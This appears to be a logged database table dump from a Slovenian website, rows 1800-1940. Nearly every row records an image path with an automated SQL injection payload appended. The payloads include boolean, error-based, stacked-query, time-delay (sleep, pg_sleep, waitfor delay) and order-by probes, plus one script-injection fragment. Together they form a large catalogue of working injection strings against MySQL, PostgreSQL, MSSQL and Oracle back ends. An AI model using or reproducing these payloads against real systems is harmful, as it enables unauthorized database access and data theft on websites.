1800. | 1 | prepovedano.gif) and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and (6468=6468 //slike//stran_5/prepovedano.gif) and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and (6468=6468 |
1801. | 1 | prepovedano.gif)) and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and ((1273=1273 //slike//stran_5/prepovedano.gif)) and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and ((1273=1273 |
1802. | 1 | prepovedano.gif and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) //slike//stran_5/prepovedano.gif and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) |
1803. | 1 | prepovedano.gif') and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and ('wcgm'='wcgm //slike//stran_5/prepovedano.gif') and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and ('wcgm'='wcgm |
1804. | 1 | prepovedano.gif')) and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and (('gsmx'='gsmx //slike//stran_5/prepovedano.gif')) and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and (('gsmx'='gsmx |
1805. | 1 | prepovedano.gif' and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and 'hfcx'='hfcx //slike//stran_5/prepovedano.gif' and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and 'hfcx'='hfcx |
1806. | 1 | prepovedano.gif') and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and ('wyde' like 'wyde //slike//stran_5/prepovedano.gif') and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and ('wyde' like 'wyde |
1807. | 1 | prepovedano.gif%' and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and 'fvgg%'='fvgg //slike//stran_5/prepovedano.gif%' and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and 'fvgg%'='fvgg |
1808. | 1 | prepovedano.gif' and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and 'dvsq' like 'dvsq //slike//stran_5/prepovedano.gif' and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and 'dvsq' like 'dvsq |
1809. | 1 | prepovedano.gif") and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and ("sujt"="sujt //slike//stran_5/prepovedano.gif") and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and ("sujt"="sujt |
1810. | 1 | prepovedano.gif" and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and "kdvj"="kdvj //slike//stran_5/prepovedano.gif" and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113)) and "kdvj"="kdvj |
1811. | 1 | prepovedano.gif and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113))-- fjpo //slike//stran_5/prepovedano.gif and 6176=concat(char(113)+char(118)+char(106)+char(118)+char(113),(select (case when (6176=6176) then char(49) else char(48) end)),char(113)+char(98)+char(107)+char(112)+char(113))-- fjpo |
1812. | 1 | prepovedano.gif) procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and (2396=2396 //slike//stran_5/prepovedano.gif) procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and (2396=2396 |
1813. | 1 | prepovedano.gif)) procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and ((1472=1472 //slike//stran_5/prepovedano.gif)) procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and ((1472=1472 |
1814. | 1 | prepovedano.gif procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) //slike//stran_5/prepovedano.gif procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) |
1815. | 1 | prepovedano.gif') procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and ('eckq'='eckq //slike//stran_5/prepovedano.gif') procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and ('eckq'='eckq |
1816. | 1 | prepovedano.gif')) procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and (('otsa'='otsa //slike//stran_5/prepovedano.gif')) procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and (('otsa'='otsa |
1817. | 1 | prepovedano.gif' procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and 'bwfp'='bwfp //slike//stran_5/prepovedano.gif' procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and 'bwfp'='bwfp |
1818. | 1 | prepovedano.gif') procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and ('okgp' like 'okgp //slike//stran_5/prepovedano.gif') procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and ('okgp' like 'okgp |
1819. | 1 | prepovedano.gif%' procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and 'cmje%'='cmje //slike//stran_5/prepovedano.gif%' procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and 'cmje%'='cmje |
1820. | 1 | prepovedano.gif' procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and 'xozg' like 'xozg //slike//stran_5/prepovedano.gif' procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and 'xozg' like 'xozg |
1821. | 1 | prepovedano.gif") procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and ("kcvn"="kcvn //slike//stran_5/prepovedano.gif") procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and ("kcvn"="kcvn |
1822. | 1 | prepovedano.gif" procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and "reyf"="reyf //slike//stran_5/prepovedano.gif" procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1) and "reyf"="reyf |
1823. | 1 | prepovedano.gif procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1)-- hsjv //slike//stran_5/prepovedano.gif procedure analyse(extractvalue(8973,concat(0x5c,0x71766a7671,(select (case when (8973=8973) then 1 else 0 end)),0x71626b7071)),1)-- hsjv |
1824. | 1 | (select 8416 from(select count(*),concat(0x71766a7671,(select (elt(8416=8416,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) //slike//stran_5/(select 8416 from(select count(*),concat(0x71766a7671,(select (elt(8416=8416,1))),0x71626b7071,floor(rand(0)*2))x from information_schema.plugins group by x)a) |
1825. | 1 | prepovedano.gif,(select 2653 from (select row(2653,8770)>(select count(*),concat(0x71766a7671,(select (elt(2653=2653,1))),0x71626b7071,floor(rand(0)*2))x from (select 9350 union select 8908 union select 6647 union select 8048)a group by x))s) //slike//stran_5/prepovedano.gif,(select 2653 from (select row(2653,8770)>(select count(*),concat(0x71766a7671,(select (elt(2653=2653,1))),0x71626b7071,floor(rand(0)*2))x from (select 9350 union select 8908 union select 6647 union select 8048)a group by x))s) |
1826. | 1 | prepovedano.gif);declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- //slike//stran_5/prepovedano.gif);declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- |
1827. | 1 | prepovedano.gif));declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- //slike//stran_5/prepovedano.gif));declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- |
1828. | 1 | prepovedano.gif;declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- //slike//stran_5/prepovedano.gif;declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- |
1829. | 1 | prepovedano.gif');declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- //slike//stran_5/prepovedano.gif');declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- |
1830. | 1 | prepovedano.gif'));declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- //slike//stran_5/prepovedano.gif'));declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- |
1831. | 1 | prepovedano.gif';declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- //slike//stran_5/prepovedano.gif';declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- |
1832. | 1 | prepovedano.gif%';declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- //slike//stran_5/prepovedano.gif%';declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- |
1833. | 1 | prepovedano.gif");declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- //slike//stran_5/prepovedano.gif");declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- |
1834. | 1 | prepovedano.gif";declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- //slike//stran_5/prepovedano.gif";declare @imvu nvarchar(4000);set @imvu=(select 'qvjvq'+(select (case when (5275=5275) then '1' else '0' end))+'qbkpq');exec @imvu-- |
1835. | 1 | (select concat(concat('qvjvq',(case when (5129=5129) then '1' else '0' end)),'qbkpq')) //slike//stran_5/(select concat(concat('qvjvq',(case when (5129=5129) then '1' else '0' end)),'qbkpq')) |
1836. | 1 | (select concat(0x71766a7671,(elt(3797=3797,1)),0x71626b7071)) //slike//stran_5/(select concat(0x71766a7671,(elt(3797=3797,1)),0x71626b7071)) |
1837. | 1 | (select char(113)+char(118)+char(106)+char(118)+char(113)+(case when (9879=9879) then char(49) else char(48) end)+char(113)+char(98)+char(107)+char(112)+char(113)) //slike//stran_5/(select char(113)+char(118)+char(106)+char(118)+char(113)+(case when (9879=9879) then char(49) else char(48) end)+char(113)+char(98)+char(107)+char(112)+char(113)) |
1838. | 1 | prepovedano.gif);select sleep(32)# //slike//stran_5/prepovedano.gif);select sleep(32)# |
1839. | 1 | prepovedano.gif));select sleep(32)# //slike//stran_5/prepovedano.gif));select sleep(32)# |
1840. | 1 | prepovedano.gif;select sleep(32)# //slike//stran_5/prepovedano.gif;select sleep(32)# |
1841. | 1 | prepovedano.gif');select sleep(32)# //slike//stran_5/prepovedano.gif');select sleep(32)# |
1842. | 1 | prepovedano.gif'));select sleep(32)# //slike//stran_5/prepovedano.gif'));select sleep(32)# |
1843. | 1 | prepovedano.gif';select sleep(32)# //slike//stran_5/prepovedano.gif';select sleep(32)# |
1844. | 1 | prepovedano.gif%';select sleep(32)# //slike//stran_5/prepovedano.gif%';select sleep(32)# |
1845. | 1 | prepovedano.gif");select sleep(32)# //slike//stran_5/prepovedano.gif");select sleep(32)# |
1846. | 1 | prepovedano.gif";select sleep(32)# //slike//stran_5/prepovedano.gif";select sleep(32)# |
1847. | 1 | prepovedano.gif);select pg_sleep(32)-- //slike//stran_5/prepovedano.gif);select pg_sleep(32)-- |
1848. | 1 | prepovedano.gif));select pg_sleep(32)-- //slike//stran_5/prepovedano.gif));select pg_sleep(32)-- |
1849. | 1 | prepovedano.gif;select pg_sleep(32)-- //slike//stran_5/prepovedano.gif;select pg_sleep(32)-- |
1850. | 1 | prepovedano.gif');select pg_sleep(32)-- //slike//stran_5/prepovedano.gif');select pg_sleep(32)-- |
1851. | 1 | prepovedano.gif'));select pg_sleep(32)-- //slike//stran_5/prepovedano.gif'));select pg_sleep(32)-- |
1852. | 1 | prepovedano.gif';select pg_sleep(32)-- //slike//stran_5/prepovedano.gif';select pg_sleep(32)-- |
1853. | 1 | prepovedano.gif%';select pg_sleep(32)-- //slike//stran_5/prepovedano.gif%';select pg_sleep(32)-- |
1854. | 1 | prepovedano.gif");select pg_sleep(32)-- //slike//stran_5/prepovedano.gif");select pg_sleep(32)-- |
1855. | 1 | prepovedano.gif";select pg_sleep(32)-- //slike//stran_5/prepovedano.gif";select pg_sleep(32)-- |
1856. | 1 | prepovedano.gif);select count(*) from generate_series(1,32000000)-- //slike//stran_5/prepovedano.gif);select count(*) from generate_series(1,32000000)-- |
1857. | 1 | prepovedano.gif));select count(*) from generate_series(1,32000000)-- //slike//stran_5/prepovedano.gif));select count(*) from generate_series(1,32000000)-- |
1858. | 1 | prepovedano.gif;select count(*) from generate_series(1,32000000)-- //slike//stran_5/prepovedano.gif;select count(*) from generate_series(1,32000000)-- |
1859. | 1 | prepovedano.gif');select count(*) from generate_series(1,32000000)-- //slike//stran_5/prepovedano.gif');select count(*) from generate_series(1,32000000)-- |
1860. | 1 | prepovedano.gif'));select count(*) from generate_series(1,32000000)-- //slike//stran_5/prepovedano.gif'));select count(*) from generate_series(1,32000000)-- |
1861. | 1 | prepovedano.gif';select count(*) from generate_series(1,32000000)-- //slike//stran_5/prepovedano.gif';select count(*) from generate_series(1,32000000)-- |
1862. | 1 | prepovedano.gif%';select count(*) from generate_series(1,32000000)-- //slike//stran_5/prepovedano.gif%';select count(*) from generate_series(1,32000000)-- |
1863. | 1 | prepovedano.gif");select count(*) from generate_series(1,32000000)-- //slike//stran_5/prepovedano.gif");select count(*) from generate_series(1,32000000)-- |
1864. | 1 | prepovedano.gif";select count(*) from generate_series(1,32000000)-- //slike//stran_5/prepovedano.gif";select count(*) from generate_series(1,32000000)-- |
1865. | 1 | prepovedano.gif);waitfor delay '0:0:32'-- //slike//stran_5/prepovedano.gif);waitfor delay '0:0:32'-- |
1866. | 1 | prepovedano.gif));waitfor delay '0:0:32'-- //slike//stran_5/prepovedano.gif));waitfor delay '0:0:32'-- |
1867. | 1 | prepovedano.gif;waitfor delay '0:0:32'-- //slike//stran_5/prepovedano.gif;waitfor delay '0:0:32'-- |
1868. | 1 | prepovedano.gif');waitfor delay '0:0:32'-- //slike//stran_5/prepovedano.gif');waitfor delay '0:0:32'-- |
1869. | 1 | prepovedano.gif'));waitfor delay '0:0:32'-- //slike//stran_5/prepovedano.gif'));waitfor delay '0:0:32'-- |
1870. | 1 | prepovedano.gif';waitfor delay '0:0:32'-- //slike//stran_5/prepovedano.gif';waitfor delay '0:0:32'-- |
1871. | 1 | prepovedano.gif%';waitfor delay '0:0:32'-- //slike//stran_5/prepovedano.gif%';waitfor delay '0:0:32'-- |
1872. | 1 | prepovedano.gif");waitfor delay '0:0:32'-- //slike//stran_5/prepovedano.gif");waitfor delay '0:0:32'-- |
1873. | 1 | prepovedano.gif";waitfor delay '0:0:32'-- //slike//stran_5/prepovedano.gif";waitfor delay '0:0:32'-- |
1874. | 1 | prepovedano.gif);declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_5/prepovedano.gif);declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1875. | 1 | prepovedano.gif));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_5/prepovedano.gif));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1876. | 1 | prepovedano.gif;declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_5/prepovedano.gif;declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1877. | 1 | prepovedano.gif');declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_5/prepovedano.gif');declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1878. | 1 | prepovedano.gif'));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_5/prepovedano.gif'));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1879. | 1 | prepovedano.gif';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_5/prepovedano.gif';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1880. | 1 | prepovedano.gif%';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_5/prepovedano.gif%';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1881. | 1 | prepovedano.gif");declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_5/prepovedano.gif");declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1882. | 1 | prepovedano.gif";declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_5/prepovedano.gif";declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1883. | 1 | prepovedano.gif);select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_5/prepovedano.gif);select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1884. | 1 | prepovedano.gif));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_5/prepovedano.gif));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1885. | 1 | prepovedano.gif;select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_5/prepovedano.gif;select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1886. | 1 | prepovedano.gif');select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_5/prepovedano.gif');select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1887. | 1 | prepovedano.gif'));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_5/prepovedano.gif'));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1888. | 1 | prepovedano.gif';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_5/prepovedano.gif';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1889. | 1 | prepovedano.gif%';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_5/prepovedano.gif%';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1890. | 1 | prepovedano.gif");select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_5/prepovedano.gif");select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1891. | 1 | prepovedano.gif";select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_5/prepovedano.gif";select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1892. | 1 | prepovedano.gif) order by 1-- xecs //slike//stran_5/prepovedano.gif) order by 1-- xecs |
1893. | 1 | prepovedano.gif) order by 6396-- zhtx //slike//stran_5/prepovedano.gif) order by 6396-- zhtx |
1894. | 1 | prepovedano.gif)) order by 1-- mued //slike//stran_5/prepovedano.gif)) order by 1-- mued |
1895. | 1 | prepovedano.gif)) order by 8044-- twzf //slike//stran_5/prepovedano.gif)) order by 8044-- twzf |
1896. | 1 | prepovedano.gif order by 1-- gruk //slike//stran_5/prepovedano.gif order by 1-- gruk |
1897. | 1 | prepovedano.gif order by 6991-- rxph //slike//stran_5/prepovedano.gif order by 6991-- rxph |
1898. | 1 | prepovedano.gif') order by 1-- wnek //slike//stran_5/prepovedano.gif') order by 1-- wnek |
1899. | 1 | prepovedano.gif') order by 6925-- ctrp //slike//stran_5/prepovedano.gif') order by 6925-- ctrp |
1900. | 1 | prepovedano.gif')) order by 1-- cqxo //slike//stran_5/prepovedano.gif')) order by 1-- cqxo |
1901. | 1 | prepovedano.gif')) order by 6364-- uhez //slike//stran_5/prepovedano.gif')) order by 6364-- uhez |
1902. | 1 | prepovedano.gif' order by 1-- oyfv //slike//stran_5/prepovedano.gif' order by 1-- oyfv |
1903. | 1 | prepovedano.gif' order by 8645-- oveg //slike//stran_5/prepovedano.gif' order by 8645-- oveg |
1904. | 1 | prepovedano.gif') order by 1-- nuph //slike//stran_5/prepovedano.gif') order by 1-- nuph |
1905. | 1 | prepovedano.gif') order by 1479-- qpgl //slike//stran_5/prepovedano.gif') order by 1479-- qpgl |
1906. | 1 | prepovedano.gif%' order by 1-- yeox //slike//stran_5/prepovedano.gif%' order by 1-- yeox |
1907. | 1 | prepovedano.gif%' order by 7587-- uvwg //slike//stran_5/prepovedano.gif%' order by 7587-- uvwg |
1908. | 1 | prepovedano.gif' order by 1-- qdxz //slike//stran_5/prepovedano.gif' order by 1-- qdxz |
1909. | 1 | prepovedano.gif' order by 7681-- bkgy //slike//stran_5/prepovedano.gif' order by 7681-- bkgy |
1910. | 1 | prepovedano.gif") order by 1-- degj //slike//stran_5/prepovedano.gif") order by 1-- degj |
1911. | 1 | prepovedano.gif") order by 8211-- dokj //slike//stran_5/prepovedano.gif") order by 8211-- dokj |
1912. | 1 | prepovedano.gif" order by 1-- zfxa //slike//stran_5/prepovedano.gif" order by 1-- zfxa |
1913. | 1 | prepovedano.gif" order by 7161-- gfoo //slike//stran_5/prepovedano.gif" order by 7161-- gfoo |
1914. | 1 | prepovedano.gif order by 1-- wlks //slike//stran_5/prepovedano.gif order by 1-- wlks |
1915. | 1 | prepovedano.gif order by 8739-- hjcr //slike//stran_5/prepovedano.gif order by 8739-- hjcr |
1916. | 1 | prepovedano.gif) order by 1# //slike//stran_5/prepovedano.gif) order by 1# |
1917. | 1 | prepovedano.gif) order by 7576# //slike//stran_5/prepovedano.gif) order by 7576# |
1918. | 1 | prepovedano.gif)) order by 1# //slike//stran_5/prepovedano.gif)) order by 1# |
1919. | 1 | prepovedano.gif)) order by 7672# //slike//stran_5/prepovedano.gif)) order by 7672# |
1920. | 1 | prepovedano.gif order by 4473# //slike//stran_5/prepovedano.gif order by 4473# |
1921. | 1 | prepovedano.gif') order by 7477# //slike//stran_5/prepovedano.gif') order by 7477# |
1922. | 1 | prepovedano.gif')) order by 1# //slike//stran_5/prepovedano.gif')) order by 1# |
1923. | 1 | prepovedano.gif')) order by 4300# //slike//stran_5/prepovedano.gif')) order by 4300# |
1924. | 1 | prepovedano.gif' order by 6612# //slike//stran_5/prepovedano.gif' order by 6612# |
1925. | 1 | prepovedano.gif') order by 4601# //slike//stran_5/prepovedano.gif') order by 4601# |
1926. | 1 | prepovedano.gif%' order by 1# //slike//stran_5/prepovedano.gif%' order by 1# |
1927. | 1 | prepovedano.gif%' order by 5165# //slike//stran_5/prepovedano.gif%' order by 5165# |
1928. | 1 | prepovedano.gif' order by 7927# //slike//stran_5/prepovedano.gif' order by 7927# |
1929. | 1 | prepovedano.gif") order by 1# //slike//stran_5/prepovedano.gif") order by 1# |
1930. | 1 | prepovedano.gif") order by 6091# //slike//stran_5/prepovedano.gif") order by 6091# |
1931. | 1 | prepovedano.gif" order by 1# //slike//stran_5/prepovedano.gif" order by 1# |
1932. | 1 | prepovedano.gif" order by 6391# //slike//stran_5/prepovedano.gif" order by 6391# |
1933. | 1 | prepovedano.gif order by 2542# //slike//stran_5/prepovedano.gif order by 2542# |
1934. | 1 | balance.gif(',,,.(.". //slike//stran_1 AND 5486/balance.gif(',,,.(.". |
1935. | 1 | aizkij','','scrollbars=1,resizable=1');">balance.gif'nyupqc<'">aizkij //slike//stran_1 AND 5486/balance.gif'nyupqc<'">aizkij |
1936. | 1 | balance.gif) and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (1803=1803 //slike//stran_1 AND 5486/balance.gif) and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (1803=1803 |
1937. | 1 | balance.gif)) and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ((1207=1207 //slike//stran_1 AND 5486/balance.gif)) and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ((1207=1207 |
1938. | 1 | balance.gif and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) //slike//stran_1 AND 5486/balance.gif and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) |
1939. | 1 | balance.gif') and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('cpkp'='cpkp //slike//stran_1 AND 5486/balance.gif') and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('cpkp'='cpkp |
1940. | 1 | balance.gif')) and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (('fmyi'='fmyi //slike//stran_1 AND 5486/balance.gif')) and (select 4624 from(select count(*),concat(0x7170767171,(select (elt(4624=4624,1))),0x716b627671,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (('fmyi'='fmyi |
